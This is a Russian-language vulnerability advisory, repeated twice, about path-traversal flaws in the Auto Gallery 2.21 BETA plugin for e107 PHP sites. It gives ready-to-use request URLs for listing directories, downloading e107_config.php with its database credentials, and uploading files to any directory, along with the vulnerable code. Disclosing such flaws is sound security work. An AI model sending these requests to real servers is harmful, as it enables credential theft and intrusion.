листинг директорий сервера
программа:Auto Gallery версии 2.21 BETA и предыдущие
платформа: PHP
последствия:
Не достаточная фильтрация пеменной "show" в "autogallery/autogallery.php" дает возможность листинга директорий сервера. Не достаточная фильтрация пеменной "img" в "autogallery/showimage.php" дает возможность скачать любой файл с сервера. Не достаточная фильтрация пеменной "gallery" в "autogallery/upload.php" дает возможность загрузка файлов в любую директорию сервера.
описание:
Уязвимый код находится в файле "autogallery/autogallery.php"
Запрос http://[TARGET]/autogallery/autogallery.php?show=..%2F%00
дает возможность просмотреть список файлов директории
Уязвимый код находится в файле "autogallery/showimage.php"
Запросом http://[TARGET]/autogallery/showimage.php?img=../../../e107_config.php
мы скачиваем файл http://[TARGET]/e107_config.php с настройками CMS и MySQL
и так можно любой другой файл сервера зная точный путь.
Уязвимый код находится в файле "autogallery/upload.php"
Можно подделать запрос добавив &gallery=..%2FLog%2F и закачать файл в любую другую директорию с правами вэб сервера.
решение:Способов устранения уязвимости не существует в настоящее время.
:zns2: Сerebral Synergy
Источник: http://ivdb.org/
Уязвимость обнаружил: Одинокий Волк aka Lonely Wolf
программа:Auto Gallery версии 2.21 BETA и предыдущие
платформа: PHP
последствия:
Не достаточная фильтрация пеменной "show" в "autogallery/autogallery.php" дает возможность листинга директорий сервера. Не достаточная фильтрация пеменной "img" в "autogallery/showimage.php" дает возможность скачать любой файл с сервера. Не достаточная фильтрация пеменной "gallery" в "autogallery/upload.php" дает возможность загрузка файлов в любую директорию сервера.
описание:
Уязвимый код находится в файле "autogallery/autogallery.php"
Код:
...
$selElement = rawurldecode($_GET['show']);
$selElement = stripslashes($selElement);
...
дает возможность просмотреть список файлов директории
Уязвимый код находится в файле "autogallery/showimage.php"
Код:
...
require_once(dirname(__FILE__)."/def.php");
$image = stripslashes(rawurldecode($_GET['img']));
$imageInfo = AutoGal_GetElementInfo($image);
$image = $imageInfo['abspath'];
AutoGal_DrawImage($image);
...
мы скачиваем файл http://[TARGET]/e107_config.php с настройками CMS и MySQL
и так можно любой другой файл сервера зная точный путь.
Уязвимый код находится в файле "autogallery/upload.php"
Код:
...
$selGallery = stripslashes(rawurldecode($_GET[\'gallery\'] ? $_GET[\'gallery\'] : $_POST[\'gallery\']));
...
решение:Способов устранения уязвимости не существует в настоящее время.
:zns2: Сerebral Synergy
Источник: http://ivdb.org/
Уязвимость обнаружил: Одинокий Волк aka Lonely Wolf